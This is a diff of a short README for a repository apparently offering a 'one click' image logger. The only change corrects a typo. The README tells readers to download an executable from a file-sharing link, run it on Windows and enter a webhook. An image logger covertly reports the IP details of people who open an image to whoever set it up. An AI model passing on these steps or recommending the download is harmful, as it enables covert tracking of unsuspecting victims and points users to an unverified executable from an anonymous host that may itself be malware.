annonymus69/Image-logger/README.md

 # Image-logger
-This is a One CLick image logger step 1:download https://filebin.net/qfebvdplcgec8vkd step 2:open image logger.exe (must be on windows) step 3:put ur webhook
+This is a One Click image logger step 1:download https://filebin.net/qfebvdplcgec8vkd step 2:open image logger.exe (must be on windows) step 3:put ur webhook